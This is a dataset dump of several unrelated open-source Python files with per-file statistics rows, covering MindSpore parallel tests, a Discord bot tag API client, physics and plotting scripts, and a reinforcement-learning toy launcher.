context.set_auto_parallel_context(parallel_mode="semi_auto_parallel", device_num=2, global_rank=0)
strategy1 = ((2, 1), (1, 2))
strategy2 = ((1, 2, 1), (1, 2, 1))
strategy3 = ((1, 2), (2, 1))
net = Net(strategy1, strategy2, strategy3)
compile_net(net)
def test_normal_split2():
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel", device_num=4, global_rank=0)
strategy1 = ((4, 1), (1, 4))
strategy2 = ((1, 4, 1), (1, 4, 1))
strategy3 = ((1, 4), (4, 1))
net = Net(strategy1, strategy2, strategy3, split_tuple=(10, 20, 30, 4), param_shape=(64, 8))
compile_net(net)
def test_normal_split3():
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel", device_num=32, global_rank=17)
strategy1 = ((4, 8), (1, 4))
strategy2 = ((1, 4, 8), (1, 4, 8))
strategy3 = ((1, 32), (32, 1))
net = Net(strategy1, strategy2, strategy3, split_tuple=(10, 20, 30, 4), param_shape=(64, 8))
compile_net(net)
def test_normal_split_with_offset():
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel", device_num=2, global_rank=0)
strategy1 = ((2, 1), (1, 2))
strategy2 = ((1, 2, 1), (1, 2, 1))
strategy3 = ((1, 2), (2, 1))
net = Net(strategy1, strategy2, strategy3, split_string="manual_split_with_offset", split_tuple=((4, 0), (4, 4)))
compile_net(net)
def test_auto_parallel_error():
context.set_auto_parallel_context(parallel_mode="auto_parallel", device_num=2, global_rank=0)
net = Net()
with pytest.raises(RuntimeError):
compile_net(net)
def test_axis_error():
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel", device_num=2, global_rank=0)
strategy1 = ((2, 1), (1, 2))
strategy2 = ((1, 2, 1), (1, 2, 1))
strategy3 = ((1, 2), (2, 1))
net = Net(strategy1, strategy2, strategy3, axis=1)
with pytest.raises(RuntimeError):
compile_net(net)
def test_strategy_error():
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel", device_num=8, global_rank=0)
strategy1 = ((4, 1), (8, 1))
strategy2 = ((1, 2, 1), (1, 2, 1))
strategy3 = ((1, 2), (2, 1))
net = Net(strategy1, strategy2, strategy3)
with pytest.raises(RuntimeError):
compile_net(net)
def test_strategy_error2():
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel", device_num=8, global_rank=0)
strategy1 = ((4, 1), (1, 8))
strategy2 = ((1, 2, 1), (1, 2, 1))
strategy3 = ((1, 2), (2, 1))
net = Net(strategy1, strategy2, strategy3)
with pytest.raises(RuntimeError):
compile_net(net)
def test_strategy_error3():
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel", device_num=8, global_rank=0)
strategy1 = ((2, 1), (1, 2))
strategy2 = ((1, 2, 1), (1, 2, 1))
strategy3 = ((1, 2), (2, 1))
net = Net(strategy1, strategy2, strategy3)
with pytest.raises(RuntimeError):
compile_net(net)
def test_strategy_error4():
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel", device_num=2, global_rank=0)
strategy1 = ((2, 8), (1, 2))
strategy2 = ((1, 2, 1), (1, 2, 1))
strategy3 = ((1, 2), (2, 1))
net = Net(strategy1, strategy2, strategy3)
with pytest.raises(RuntimeError):
compile_net(net)
def test_strategy_error5():
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel", device_num=4, global_rank=0)
strategy1 = ((4, 1), (1, 4))
strategy2 = ((1, 2, 1), (1, 2, 1))
strategy3 = ((1, 2), (2, 1))
net = Net(strategy1, strategy2, strategy3)
with pytest.raises(RuntimeError):
compile_net(net)
def test_split_tuple_error():
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel", device_num=2, global_rank=0)
strategy1 = ((2, 1), (1, 2))
strategy2 = ((1, 2, 1), (1, 2, 1))
strategy3 = ((1, 2), (2, 1))
net = Net(strategy1, strategy2, strategy3, split_tuple=((5, 0), (5, 5)))
with pytest.raises(RuntimeError):
compile_net(net)
def test_parameter_use_tensor_error():
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel", device_num=2, global_rank=0)
strategy1 = ((2, 1), (1, 2))
strategy2 = ((1, 2, 1), (1, 2, 1))
strategy3 = ((1, 2), (2, 1))
net = Net(strategy1, strategy2, strategy3, init_flag=False)
with pytest.raises(RuntimeError):
compile_net(net)
| 37.703125
| 117
| 0.654234
| 1,016
| 7,239
| 4.448819
| 0.17126
| 0.016372
| 0.013274
| 0.014159
| 0.565044
| 0.546018
| 0.540265
| 0.530973
| 0.512389
| 0.49115
| 0
| 0.061707
| 0.194088
| 7,239
| 191
| 118
| 37.900524
| 0.713061
| 0.088134
| 0
| 0.479167
| 0
| 0
| 0.053143
| 0.006985
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0
| 0.055556
| 0
| 0.180556
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe4088c9d39d6abd819f54e637798544df93b9db
| 3,396
|
py
|
Python
|
ClemBot.Bot/bot/api/tag_route.py
|
makayla-moster/ClemBot
|
26503d25f1fbe2abcf99dbf0f68b17e88ad11a7c
|
[
"MIT"
] | 121
|
2020-04-25T06:20:28.000Z
|
2021-06-07T03:08:46.000Z
|
ClemBot.Bot/bot/api/tag_route.py
|
makayla-moster/ClemBot
|
26503d25f1fbe2abcf99dbf0f68b17e88ad11a7c
|
[
"MIT"
] | 180
|
2020-04-25T04:49:51.000Z
|
2021-06-22T15:21:30.000Z
|
ClemBot.Bot/bot/api/tag_route.py
|
makayla-moster/ClemBot
|
26503d25f1fbe2abcf99dbf0f68b17e88ad11a7c
|
[
"MIT"
] | 72
|
2020-04-25T03:28:49.000Z
|
2021-06-20T20:17:00.000Z
|
from bot.api.api_client import ApiClient
from bot.api.base_route import BaseRoute
import typing as t
from bot.models import Tag
class TagRoute(BaseRoute):
def __init__(self, api_client: ApiClient):
super().__init__(api_client)
async def create_tag(self, name: str, content: str, guild_id: int, user_id: int, **kwargs) -> t.Optional[Tag]:
json = {
'Name': name,
'Content': content,
'GuildId': guild_id,
'UserId': user_id,
}
tag_dict = await self._client.post('tags', data=json, **kwargs)
if not tag_dict:
return None
return Tag.from_dict(tag_dict)
async def edit_tag_content(self, guild_id: int, name: str, content: str, **kwargs) -> t.Optional[Tag]:
json = {
'GuildId': guild_id,
'Name': name,
'Content': content
}
tag_dict = await self._client.patch('bot/tags', data=json, **kwargs)
if not tag_dict:
return None
return Tag.from_dict(tag_dict)
async def edit_tag_owner(self, guild_id: int, name: str, user_id: int, **kwargs) -> t.Optional[Tag]:
json = {
'GuildId': guild_id,
'Name': name,
'UserId': user_id
}
tag_dict = await self._client.patch('bot/tags', data=json, **kwargs)
if not tag_dict:
return None
return Tag.from_dict(tag_dict)
async def get_tag(self, guild_id: int, name: str) -> t.Optional[Tag]:
json = {
'GuildId': guild_id,
'Name': name,
}
tag_dict = await self._client.get('bot/tags', data=json)
if not tag_dict:
return None
return Tag.from_dict(tag_dict)
async def get_tag_content(self, guild_id: int, name: str) -> t.Optional[str]:
json = {
'GuildId': guild_id,
'Name': name,
}
resp = await self._client.get('bot/tags', data=json)
return None if resp is None else resp['content']
async def delete_tag(self, guild_id: int, name: str, **kwargs):
"""
Makes a call to the API to delete a tag w/ the given GuildId and Name.
If successful, the API will return a dict with the given values:
- name The name of the tag.
- content The content of the tag.
- guildId The guild id the tag was in.
"""
json = {
'GuildId': guild_id,
'Name': name,
}
return await self._client.delete('bot/tags', data=json, **kwargs)
async def add_tag_use(self, guild_id: int, name: str, channel_id: int, user_id: int):
"""
Makes a call to the API to say a tag w/ the given Name was used.
If successful, the API will return a dict with the given values:
- name The name of the tag.
- guildId The guild id the tag is in.
"""
json = {
'GuildId': guild_id,
'Name': name,
'ChannelId': channel_id,
'UserId': user_id
}
return await self._client.post('bot/tags/invoke', data=json)
async def get_guilds_tags(self, guild_id: int) -> t.Iterator[Tag]:
resp = await self._client.get(f'guilds/{guild_id}/tags')
if not resp:
return []
return [Tag.from_dict(i) for i in resp['tags']]
| 33.294118
| 114
| 0.564193
| 457
| 3,396
| 4.030635
| 0.170678
| 0.068404
| 0.043431
| 0.053203
| 0.652009
| 0.598263
| 0.561346
| 0.4962
| 0.366992
| 0.317047
| 0
| 0
| 0.324794
| 3,396
| 101
| 115
| 33.623762
| 0.803314
| 0
| 0
| 0.506849
| 0
| 0
| 0.073814
| 0.007733
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013699
| false
| 0
| 0.054795
| 0
| 0.260274
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe40ab7f78d9978c2d19631879cf3439c2112560
| 2,967
|
py
|
Python
|
formfactor_AL.py
|
kirichoi/PolymerConnectome
|
064df932cfca57a97e62dfa9a32d1fa976500906
|
[
"MIT"
] | null | null | null |
formfactor_AL.py
|
kirichoi/PolymerConnectome
|
064df932cfca57a97e62dfa9a32d1fa976500906
|
[
"MIT"
] | null | null | null |
formfactor_AL.py
|
kirichoi/PolymerConnectome
|
064df932cfca57a97e62dfa9a32d1fa976500906
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Mon Sep 7 10:59:00 2020
@author: user
"""
import numpy as np
import multiprocessing as mp
import matplotlib.pyplot as plt
import time
import itertools
import ctypes
def formfactor(args):
# with AL_dist_flat_glo.get_lock:
AL_dist_flat_glo_r = np.frombuffer(AL_dist_flat_glo.get_obj())
AL_dist_flat_glo_s = AL_dist_flat_glo_r.reshape((n_glo.value,m_glo.value))
# ffq = np.sum(np.cos(np.dot(np.logspace(-2,3,100)[args[0]]*np.array([1,0,0]),
# np.subtract(AL_dist_flat_glo_s[args[1]], AL_dist_flat_glo_s[1+args[1]:]).T)))
qr = np.logspace(-2,3,100)[args[0]]
rvec = np.subtract(AL_dist_flat_glo_s[args[1]], AL_dist_flat_glo_s[1+args[1]:]).T
cosx = np.cos(np.dot(qr*np.array([1,0,0]), rvec))
cosy = np.cos(np.dot(qr*np.array([0,1,0]), rvec))
cosz = np.cos(np.dot(qr*np.array([0,0,1]), rvec))
# cosxy = np.cos(np.dot(qr*np.array([0.707,0.707,0]), rvec))
# cosyz = np.cos(np.dot(qr*np.array([0,0.707,0.707]), rvec))
# cosxz = np.cos(np.dot(qr*np.array([0.707,0,0.707]), rvec))
# cosxyz = np.cos(np.dot(qr*np.array([0.577,0.577,0.577]), rvec))
ffq = np.sum(np.mean(np.array([cosx, cosy, cosz]), axis=0))
return ffq
def parallelinit(AL_dist_flat_glo_, n_glo_, m_glo_):
global AL_dist_flat_glo, n_glo, m_glo
AL_dist_flat_glo = AL_dist_flat_glo_
n_glo = n_glo_
m_glo = m_glo_
if __name__ == '__main__':
AL_dist_flat = np.load(r'./AL_dist_flat.npy')
n = np.shape(AL_dist_flat)[0]
m = np.shape(AL_dist_flat)[1]
q_range = np.logspace(-2,3,100)
# r_x = np.array([1, 0, 0])
# q_range_glo = mp.Array(ctypes.c_double, q_range)
AL_dist_flat_glo = mp.Array(ctypes.c_double, AL_dist_flat.flatten())
n_glo = mp.Value(ctypes.c_int, n)
m_glo = mp.Value(ctypes.c_int, m)
# r_x_glo = mp.Array(ctypes.c_double, r_x)
paramlist = list(itertools.product(range(100), range(n)))
pool = mp.Pool(20, initializer=parallelinit, initargs=(AL_dist_flat_glo, n_glo, m_glo))
t1 = time.time()
results = pool.map(formfactor, paramlist)
pool.close()
t2 = time.time()
print(t2-t1)
np.save(r'./AL_results.npy', results)
Pq = 2*np.divide(np.sum(np.array(results).reshape(100, n), axis=1), n)
# fig = plt.figure(figsize=(8,6))
# plt.plot(q_range, Pq, lw=3, color='tab:orange')
# plt.xscale('log')
# plt.xlabel('$q$', fontsize=15)
# plt.ylabel('$P(q)$', fontsize=15)
# plt.tight_layout()
# plt.savefig(r'./AL_form_factor.pdf', dpi=300, bbox_inches='tight')
# plt.show()
fig = plt.figure(figsize=(8,6))
plt.plot(q_range, Pq, lw=3, color='tab:orange')
plt.xscale('log')
plt.yscale('log')
plt.xlabel('$q$', fontsize=15)
plt.ylabel('$P(q)$', fontsize=15)
plt.tight_layout()
plt.savefig(r'./AL_form_factor_log.pdf', dpi=300, bbox_inches='tight')
plt.show()
| 33.337079
| 110
| 0.625211
| 528
| 2,967
| 3.291667
| 0.246212
| 0.069045
| 0.115075
| 0.112198
| 0.574799
| 0.478711
| 0.406214
| 0.372267
| 0.27733
| 0.253165
| 0
| 0.052326
| 0.188406
| 2,967
| 88
| 111
| 33.715909
| 0.669435
| 0.305022
| 0
| 0
| 0
| 0
| 0.047151
| 0.011788
| 0
| 0
| 0
| 0
| 0
| 1
| 0.042553
| false
| 0
| 0.12766
| 0
| 0.191489
| 0.021277
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe427f872414bfa986cd9b2c48b6113399437840
| 1,039
|
py
|
Python
|
utils/tests.py
|
nanodude/cairocffi
|
9d6a9a420a91da80f7901ace9945fd864f5d04dc
|
[
"BSD-3-Clause"
] | null | null | null |
utils/tests.py
|
nanodude/cairocffi
|
9d6a9a420a91da80f7901ace9945fd864f5d04dc
|
[
"BSD-3-Clause"
] | null | null | null |
utils/tests.py
|
nanodude/cairocffi
|
9d6a9a420a91da80f7901ace9945fd864f5d04dc
|
[
"BSD-3-Clause"
] | null | null | null |
# coding: utf-8
import io
import cairo # pycairo
import cairocffi
from pycairo_to_cairocffi import _UNSAFE_pycairo_context_to_cairocffi
from cairocffi_to_pycairo import _UNSAFE_cairocffi_context_to_pycairo
import pango_example
def test():
cairocffi_context = cairocffi.Context(cairocffi.PDFSurface(None, 10, 20))
cairocffi_context.scale(2, 3)
pycairo_context = _UNSAFE_cairocffi_context_to_pycairo(cairocffi_context)
cairocffi_context2 = _UNSAFE_pycairo_context_to_cairocffi(pycairo_context)
assert tuple(cairocffi_context.get_matrix()) == (2, 0, 0, 3, 0, 0)
assert tuple(cairocffi_context2.get_matrix()) == (2, 0, 0, 3, 0, 0)
assert tuple(pycairo_context.get_matrix()) == (2, 0, 0, 3, 0, 0)
assert cairocffi_context2._pointer == cairocffi_context._pointer
file_obj = io.BytesIO()
# Mostly test that this runs without raising.
pango_example.write_example_pdf(file_obj)
assert file_obj.getvalue().startswith(b'%PDF')
if __name__ == '__main__':
test()
| 34.633333
| 79
| 0.73821
| 139
| 1,039
| 5.122302
| 0.33813
| 0.179775
| 0.105337
| 0.046348
| 0.296348
| 0.122191
| 0.122191
| 0.122191
| 0.122191
| 0.122191
| 0
| 0.032407
| 0.168431
| 1,039
| 29
| 80
| 35.827586
| 0.791667
| 0.06256
| 0
| 0
| 0
| 0
| 0.012752
| 0
| 0
| 0
| 0
| 0
| 0.25
| 1
| 0.05
| false
| 0
| 0.3
| 0
| 0.35
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe440692a08637fae6bb18f0a67dbb7336fec900
| 1,909
|
py
|
Python
|
gentable/gen_test_cases.py
|
selavy/studies
|
e17b91ffab193e46fec00cf2b8070dbf1f2c39e3
|
[
"MIT"
] | null | null | null |
gentable/gen_test_cases.py
|
selavy/studies
|
e17b91ffab193e46fec00cf2b8070dbf1f2c39e3
|
[
"MIT"
] | null | null | null |
gentable/gen_test_cases.py
|
selavy/studies
|
e17b91ffab193e46fec00cf2b8070dbf1f2c39e3
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import random
N = 32
M = 64
# NOTE: 0 is a reserved value
randu = lambda x: random.randint(1, 2**x-1)
randU32 = lambda: randu(32)
randU64 = lambda: randu(64)
fmt_by_dtype = {
'u32hex': '0x{:08x}',
'u64hex': '0x{:016x}',
}
cpp_by_dtype = {
'u32hex': 'uint32_t',
'u64hex': 'uint64_t',
}
# key = randU32()
# vals = [(key, randU32(), randU64()) for _ in range(N)]
# keys = [(x[0], x[1]) for x in vals]
# success = [random.choice(vals) for _ in range(M)]
# failure = []
keys = [(randU32(),) for _ in range(M)]
vals = [(randU32(), randU64()) for _ in range(N)]
def genval():
y = randU32()
while y in vals:
y = randU32()
return y
miss = [(genval(),) for _ in range(M)]
def print_vector(vals, name, dtypes, indent=0):
indent = ' ' * indent
tabs = indent + ' '
cpptypes = [cpp_by_dtype[dt] for dt in dtypes]
if len(cpptypes) == 1:
cctype = cpptypes[0]
def fmtrow(vs): return vs
else:
cctype = f"std::tuple<{', '.join(cpptypes)}>"
def fmtrow(vs): return f"{{ {vs} }}"
fmts = [fmt_by_dtype[dt] for dt in dtypes]
print(f"{indent}const std::vector<{cctype}> {name} = {{")
rows = [
tabs + fmtrow(', '.join([fmt.format(v) for v, fmt in zip(vs, fmts)])) + ','
for vs in vals
]
print("\n".join(rows))
print(f"{indent}}};")
print('TEST_CASE("Insert random values and look them up", "[gentbl]")')
print('{')
print_vector(keys, name='keys', dtypes=['u32hex'], indent=4)
print()
print_vector(vals, name='vals', dtypes=['u32hex', 'u64hex'], indent=4)
print()
print_vector(miss, name='miss', dtypes=['u32hex'], indent=4)
print()
print('}')
# print("const std::vector<std::tuple<uint32_t, uint32_t, uint64_t>> vs = {")
# for _ in range(N):
# print(" {{ 0x{:08x}, 0x{:08x}, 0x{:016x} }},".format(
# randU32(), randU32(), randU64()))
# print("};")
| 24.474359
| 83
| 0.572027
| 271
| 1,909
| 3.940959
| 0.313653
| 0.02809
| 0.05618
| 0.030899
| 0.169476
| 0.142322
| 0.041199
| 0
| 0
| 0
| 0
| 0.060201
| 0.216867
| 1,909
| 77
| 84
| 24.792208
| 0.654181
| 0.224725
| 0
| 0.102041
| 0
| 0
| 0.182561
| 0.014305
| 0
| 0
| 0
| 0
| 0
| 1
| 0.081633
| false
| 0
| 0.020408
| 0.040816
| 0.122449
| 0.265306
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe449c44aa57e39f59499c7b75ef20b3e5b78b64
| 6,143
|
py
|
Python
|
examples/toy_env/run_toy_env.py
|
aaspeel/deer
|
3ced3695f0ca8537337019d2e3ec0ff8bd346d91
|
[
"BSD-3-Clause"
] | null | null | null |
examples/toy_env/run_toy_env.py
|
aaspeel/deer
|
3ced3695f0ca8537337019d2e3ec0ff8bd346d91
|
[
"BSD-3-Clause"
] | null | null | null |
examples/toy_env/run_toy_env.py
|
aaspeel/deer
|
3ced3695f0ca8537337019d2e3ec0ff8bd346d91
|
[
"BSD-3-Clause"
] | null | null | null |
"""Toy environment launcher. See the docs for more details about this environment.
"""
import sys
import logging
import numpy as np
from deer.default_parser import process_args
from deer.agent import NeuralAgent
from deer.learning_algos.q_net_keras import MyQNetwork
from Toy_env import MyEnv as Toy_env
import deer.experiment.base_controllers as bc
from deer.policies import EpsilonGreedyPolicy
class Defaults:
# ----------------------
# Experiment Parameters
# ----------------------
STEPS_PER_EPOCH = 1000
EPOCHS = 50
STEPS_PER_TEST = 500
PERIOD_BTW_SUMMARY_PERFS = 1
# ----------------------
# Environment Parameters
# ----------------------
FRAME_SKIP = 1
# ----------------------
# DQN Agent parameters:
# ----------------------
UPDATE_RULE = 'rmsprop'
LEARNING_RATE = 0.005
LEARNING_RATE_DECAY = 1.
DISCOUNT = 0.9
DISCOUNT_INC = 1.
DISCOUNT_MAX = 0.99
RMS_DECAY = 0.9
RMS_EPSILON = 0.0001
MOMENTUM = 0
CLIP_NORM = 1.0
EPSILON_START = 1.0
EPSILON_MIN = .1
EPSILON_DECAY = 10000
UPDATE_FREQUENCY = 1
REPLAY_MEMORY_SIZE = 1000000
BATCH_SIZE = 32
FREEZE_INTERVAL = 1000
DETERMINISTIC = True
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO)
# --- Parse parameters ---
parameters = process_args(sys.argv[1:], Defaults)
if parameters.deterministic:
rng = np.random.RandomState(123456)
else:
rng = np.random.RandomState()
# --- Instantiate environment ---
env = Toy_env(rng)
# --- Instantiate qnetwork ---
qnetwork = MyQNetwork(
env,
parameters.rms_decay,
parameters.rms_epsilon,
parameters.momentum,
parameters.clip_norm,
parameters.freeze_interval,
parameters.batch_size,
parameters.update_rule,
rng)
train_policy = EpsilonGreedyPolicy(qnetwork, env.nActions(), rng, 0.1)
test_policy = EpsilonGreedyPolicy(qnetwork, env.nActions(), rng, 0.)
# --- Instantiate agent ---
agent = NeuralAgent(
env,
qnetwork,
parameters.replay_memory_size,
max(env.inputDimensions()[i][0] for i in range(len(env.inputDimensions()))),
parameters.batch_size,
rng,
train_policy=train_policy,
test_policy=test_policy)
# --- Bind controllers to the agent ---
# Before every training epoch (periodicity=1), we want to print a summary of the agent's epsilon, discount and
# learning rate as well as the training epoch number.
agent.attach(bc.VerboseController(
evaluate_on='epoch',
periodicity=1))
# During training epochs, we want to train the agent after every [parameters.update_frequency] action it takes.
# Plus, we also want to display after each training episode (!= than after every training) the average bellman
# residual and the average of the V values obtained during the last episode, hence the two last arguments.
agent.attach(bc.TrainerController(
evaluate_on='action',
periodicity=parameters.update_frequency,
show_episode_avg_V_value=True,
show_avg_Bellman_residual=True))
# Every epoch end, one has the possibility to modify the learning rate using a LearningRateController. Here we
# wish to update the learning rate after every training epoch (periodicity=1), according to the parameters given.
agent.attach(bc.LearningRateController(
initial_learning_rate=parameters.learning_rate,
learning_rate_decay=parameters.learning_rate_decay,
periodicity=1))
# Same for the discount factor.
agent.attach(bc.DiscountFactorController(
initial_discount_factor=parameters.discount,
discount_factor_growth=parameters.discount_inc,
discount_factor_max=parameters.discount_max,
periodicity=1))
# As for the discount factor and the learning rate, one can update periodically the parameter of the epsilon-greedy
# policy implemented by the agent. This controllers has a bit more capabilities, as it allows one to choose more
# precisely when to update epsilon: after every X action, episode or epoch. This parameter can also be reset every
# episode or epoch (or never, hence the resetEvery='none').
agent.attach(bc.EpsilonController(
initial_e=parameters.epsilon_start,
e_decays=parameters.epsilon_decay,
e_min=parameters.epsilon_min,
evaluate_on='action',
periodicity=1,
reset_every='none'))
# All previous controllers control the agent during the epochs it goes through. However, we want to interleave a
# "test epoch" between each training epoch ("one of two epochs", hence the periodicity=2). We do not want these
# test epoch to interfere with the training of the agent, which is well established by the TrainerController,
# EpsilonController and alike. Therefore, we will disable these controllers for the whole duration of the test
# epochs interleaved this way, using the controllersToDisable argument of the InterleavedTestEpochController.
# The value of this argument is a list of the indexes of all controllers to disable, their index reflecting in
# which order they were added. Here, "0" is refering to the firstly attached controller, thus the
# VerboseController; "2" refers to the thirdly attached controller, thus the LearningRateController; etc. The order
# in which the indexes are listed is not important.
# For each test epoch, we want also to display the sum of all rewards obtained, hence the showScore=True.
# Finally, we want to call the summarizePerformance method of Toy_Env every [parameters.period_btw_summary_perfs]
# *test* epochs.
agent.attach(bc.InterleavedTestEpochController(
id=0,
epoch_length=parameters.steps_per_test,
periodicity=1,
show_score=True,
summarize_every=parameters.period_btw_summary_perfs))
# --- Run the experiment ---
agent.run(parameters.epochs, parameters.steps_per_epoch)
| 39.378205
| 120
| 0.689891
| 764
| 6,143
| 5.408377
| 0.33377
| 0.029042
| 0.018877
| 0.015247
| 0.055179
| 0.040658
| 0.023233
| 0
| 0
| 0
| 0
| 0.015886
| 0.221227
| 6,143
| 155
| 121
| 39.632258
| 0.847826
| 0.447664
| 0
| 0.11828
| 0
| 0
| 0.010756
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.096774
| 0
| 0.354839
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe44a3208c6d0b6455e3244b9bf2ee35ca9096e2
| 626
|
py
|
Python
|
equilibration/sodium_models/seed_1/post_processing/rdf_calculations.py
|
Dynamical-Systems-Laboratory/IPMCsMD
|
7f0662568d37dce7dcd07b648284aa62991d343c
|
[
"MIT"
] | 2
|
2020-10-30T16:17:01.000Z
|
2021-08-23T13:58:03.000Z
|
equilibration/sodium_models/seed_9/post_processing/rdf_calculations.py
|
atruszkowska/IPMCsMD
|
d3900ea4da453bcc037fd946a2ae61cc67e316f5
|
[
"MIT"
] | null | null | null |
equilibration/sodium_models/seed_9/post_processing/rdf_calculations.py
|
atruszkowska/IPMCsMD
|
d3900ea4da453bcc037fd946a2ae61cc67e316f5
|
[
"MIT"
] | 3
|
2020-09-14T20:42:47.000Z
|
2021-12-13T07:58:16.000Z
|
# ------------------------------------------------------------------
#
# RDF and CN related analysis
#
# ------------------------------------------------------------------
import sys
py_path = '../../../../postprocessing/'
sys.path.insert(0, py_path)
py_path = '../../../../postprocessing/io_operations/'
sys.path.insert(0, py_path)
import cn_and_rdf_lmp as crl
import io_module as io
#
# Input
#
# RDF and CN intput file
rdf_file = '../nafion.rdf'
# Output file
out_file = 'rdf_cn_averaged.txt'
# Number of bins
nbins = 300
# Number of columns
ncols = 10
crl.compute_time_average(rdf_file, out_file, nbins, ncols)
| 17.885714
| 68
| 0.543131
| 77
| 626
| 4.194805
| 0.480519
| 0.074303
| 0.049536
| 0.086687
| 0.123839
| 0.123839
| 0
| 0
| 0
| 0
| 0
| 0.012821
| 0.127796
| 626
| 34
| 69
| 18.411765
| 0.578755
| 0.376997
| 0
| 0.166667
| 0
| 0
| 0.266667
| 0.181333
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.25
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe463c850bc48b7b739387d099ca1d849b457791
| 1,675
|
py
|
Python
|
venv/Lib/site-packages/plotnine/geoms/geom_pointrange.py
|
EkremBayar/bayar
|
aad1a32044da671d0b4f11908416044753360b39
|
[
"MIT"
] | null | null | null |
venv/Lib/site-packages/plotnine/geoms/geom_pointrange.py
|
EkremBayar/bayar
|
aad1a32044da671d0b4f11908416044753360b39
|
[
"MIT"
] | 1
|
2020-10-02T21:43:06.000Z
|
2020-10-15T22:52:39.000Z
|
venv/Lib/site-packages/plotnine/geoms/geom_pointrange.py
|
EkremBayar/bayar
|
aad1a32044da671d0b4f11908416044753360b39
|
[
"MIT"
] | null | null | null |
from ..doctools import document
from .geom import geom
from .geom_path import geom_path
from .geom_point import geom_point
from .geom_linerange import geom_linerange
@document
class geom_pointrange(geom):
"""
Vertical interval represented by a line with a point
{usage}
Parameters
----------
{common_parameters}
fatten : float, optional (default: 2)
A multiplicative factor used to increase the size of the
point along the line-range.
"""
DEFAULT_AES = {'alpha': 1, 'color': 'black', 'fill': None,
'linetype': 'solid', 'shape': 'o', 'size': 0.5}
REQUIRED_AES = {'x', 'y', 'ymin', 'ymax'}
DEFAULT_PARAMS = {'stat': 'identity', 'position': 'identity',
'na_rm': False, 'fatten': 4}
@staticmethod
def draw_group(data, panel_params, coord, ax, **params):
geom_linerange.draw_group(data.copy(), panel_params,
coord, ax, **params)
data['size'] = data['size'] * params['fatten']
data['stroke'] = geom_point.DEFAULT_AES['stroke']
geom_point.draw_group(data, panel_params, coord, ax, **params)
@staticmethod
def draw_legend(data, da, lyr):
"""
Draw a point in the box
Parameters
----------
data : dataframe
da : DrawingArea
lyr : layer
Returns
-------
out : DrawingArea
"""
geom_path.draw_legend(data, da, lyr)
data['size'] = data['size'] * lyr.geom.params['fatten']
data['stroke'] = geom_point.DEFAULT_AES['stroke']
geom_point.draw_legend(data, da, lyr)
return da
| 29.385965
| 70
| 0.577313
| 194
| 1,675
| 4.835052
| 0.42268
| 0.057569
| 0.063966
| 0.057569
| 0.284648
| 0.202559
| 0.202559
| 0.202559
| 0.127932
| 0.127932
| 0
| 0.004177
| 0.285373
| 1,675
| 56
| 71
| 29.910714
| 0.779449
| 0.216716
| 0
| 0.153846
| 0
| 0
| 0.121084
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076923
| false
| 0
| 0.192308
| 0
| 0.461538
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
